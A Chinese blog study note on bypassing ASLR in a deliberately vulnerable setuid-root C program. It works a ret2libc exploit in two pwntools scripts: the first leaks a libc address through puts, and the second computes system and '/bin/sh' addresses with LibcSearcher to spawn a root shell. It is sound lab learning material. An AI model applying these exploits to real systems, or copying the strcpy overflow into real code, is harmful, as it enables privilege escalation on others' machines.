pediy18-7

最新推荐文章于 2020-05-15 21:19:46 发布
最新推荐文章于 2020-05-15 21:19:46 发布
阅读量161 收藏
点赞数
分类专栏: 学习记录 pediy
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38025365/article/details/88795263
版权

绕过 ASLR -- 第二部分

漏洞代码

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 fflush(stdout);
 return 0;
}

编译命令

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

这次也可以用之前学过的泄露Libc版本然后获取到system函数和binsh。因为没有找到system_arg,所以还是使用l泄露ibc的方法。

首先确定偏移量

仍然是268

EXP1 泄露出__libc_start_main函数的真实地址

from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
vuln = ELF('./vuln')
puts_plt = vuln.plt['puts']
__libc_start_main_got = vuln.got['__libc_start_main']

payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
sh = process(['vuln',payload])
sh.recv()

获取地址main函数真实地址 0xf7e1d540

再使用libcsearcher查询libc版本,继而找到system 与 binsh地址

完成调用

EXP2

from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
vuln = ELF('./vuln')
puts_plt = vuln.plt['puts']
__libc_start_main_got = vuln.got['__libc_start_main']

"""payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
sh = process(['vuln',payload])
sh.recv()"""
__libc_start_main_addr = 0xf7e1d540
log.success('start to get libc')
libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)
libcbase = __libc_start_main_addr - libc.dump('__libc_start_main')
print "libcbase:"+hex(libcbase)
log.success('success get libcbase')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
log.success('now get shell')
payload = "A"*268 + p32(system_addr) + "AAAA" + p32(binsh_addr)
sh = process(['./vuln',payload])
sh.interactive()

 

 

 

Wwoc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PEDIY CrackMe 2007.7z
08-20
PEDIY CrackMe 2007.7z PEDIY CrackMe 2007.7z
si4.pediy.lic
05-23
si4.pediy.lic
pediy18-8
WocW的博客
04-28 210
绕过 ASLR -- 第三部分 漏洞代码 // vuln.c #include <stdio.h> #include <string.h> #include <stdlib.h> int main (int argc, char **argv) { char buf[256]; int i; seteuid(getuid()); if(argc ...
pediy18-6
WocW的博客
03-24 148
绕过ASLR -- 第一部分 漏洞代码 #include <stdio.h> #include <string.h> /* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be p...
pediy18-4
WocW的博客
03-23 212
使用 return-to-libc 绕过 NX 位 与之前做的基本rop基本相同,但是由于是课程作业,得做一下 漏洞程序代码 //vuln.c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) { char buf[256]; /* [1] */ strcpy(bu...
pediy18-1
WocW的博客
04-03 357
源代码: //vuln.c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) { char buf[256]; strcpy(buf,argv[1]); printf("Input:%s\n",buf); retu...
对话框程序Pediy
05-22
7. StdAfx.h:预编译头文件,通常包含其他头文件,以减少源代码中的重复包含。 综合这些信息,我们可以推断“对话框程序Pediy”是一个使用C++语言,基于Windows API编写的项目,主要用于获取和可能记录用户的登录...
peDIY超级教程
12-31
介绍如何修改EXE程序的教程
PEDIY软件的加密技术文章提到的一些工具,珍藏多年了
01-29
PEDIY,作为一个知名的IT技术交流平台,经常讨论各种加密技术和相关工具。这里,我们来深入探讨一下PEDIY软件加密技术文章中可能涉及到的一些核心工具和概念。 1. **对称加密**:这是最常见的加密方式,如DES(Data...
IDA远程调试Linux文件
WocW的博客
12-06 3679
开始接触linux文件,但是在windows上 OD x32/64dbg只能调试PE文件,所以开始使用IDA远程调试linux文件。 需要准备一个linux系统,虚拟机即可,然后IDA。 首先在Windwos系统里IDA的安装路径里找到dbgsrv文件夹里的linux_server和linux_server64 复制到虚拟机里,我用的是 安装VMWare Tools就可以直接在wind...
Windows内核漏洞学习-HEVD的使用
WocW的博客
05-15 2513
HEVD的使用 HEVD简单介绍和下载 ​ HEVD是一个漏洞靶场,里面有大量写好的漏洞,主要用它来学习漏洞的利用。在Github上就可以找到该项目,下面贴一下下载传送门,我用的是1.2版本。 https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/releases HEVD安装 ​ 下载好之后,程序有有漏洞和无漏洞两个版本。使用有漏洞的x86版本,根据前面学习到的驱动编程知识,将它安装到Win7 32位环境中。在安装时候选择自动执行,然后
pwn学习-canary
WocW的博客
02-26 2296
CTF-WIKI-pwn-cannary 漏洞复现   Canary 实现原理  开启 Canary 保护的 stack 结构大概如下 // ex2.c #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; void getshell...
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2229
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
pwn学习-格式化字符串的利用
WocW的博客
03-08 1950
覆盖栈内存 所用例子 /* example/overflow/overflow.c */ #include &lt;stdio.h&gt; int a = 123, b = 456; int main() { int c = 789; char s[100]; printf("%p\n", &amp;c); scanf("%s", s); printf(s); if...
pwn学习-基本ROP
WocW的博客
03-03 1922
CTF-WIKI-pwn-基本ROP 漏洞复现 ret2text 首先检查程序的保护机制。 关于各个保护机制的介绍 :https://www.cnblogs.com/Spider-spiders/p/8798628.html 看到只开启了NX保护,即不可在栈上执行代码。 使用IDA查看源码,可以看到这里有一个危险的gets函数 以及这里有一个system函数 所以如...
VS2019 加 VMware + win7 64位 驱动编程环境配置
WocW的博客
04-16 1782
根据《内核安全与驱动开发》这本书对着做的,但是环境从WIN XP换成了 WIN7 64位,IDE用成当前最新的VS2019。中途遇到了几个困难点,梳理一下解决方法。 首先是IDE的配置,这里参考https://bbs.pediy.com/thread-254041.htm 接下来是代码编译的时候。有两个点 我们要编译成64位的,因为win7 64位当然只能装64位的驱动啊。不然运行的时候会报...
攻防世界-RE-ReverseMe-120(主要是对Base64再深入熟悉一下)
WocW的博客
04-24 1697
前言 今天随机做了三题,但是感觉都是简单题,基本完成了pediy18-10,但是最后的shellcode执行上遇到了一点问题没有解决。其中有一道题,跟国赛中遇到的一题,让我很深的认识到base64加密算法的重要性。 分析 在IDA中打开,查看main函数,从最后的strcmp可以猜到是输入一个字符串,然后处理一下再与已知明文对比。 虽然有很多垃圾指令,但是通过动态调试可以知道哪些操作是有用的。动...
攻防世界-RE-三题WP
WocW的博客
04-25 1630
1.re2-cpp-is-awesome 分析 打开看看,发现需要一个参数。在IDA里查找这个luck next time,交叉引用 再次交叉引用,发现到main函数。 这里就是关键的对比了,看起来像是v8经过某个处理后与明文表对比。动态调试看看,下端点在v8,发现我们所输入的字符串没有被处理过,那就更简单了,直接最原始的明文对比。 每次将执行到这里会出现一个flag明文,在下面的跳转指...
sourceinsight4的si4.pediy.lic文件是?
最新发布
12-29
sourceinsight4的si4.pediy.lic文件是Source Insight4软件的授权文件。在安装Source Insight4时,用户需要获得一份有效的授权文件,即si4.pediy.lic文件。该文件包含了软件使用的许可证信息,包括用户的注册信息和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值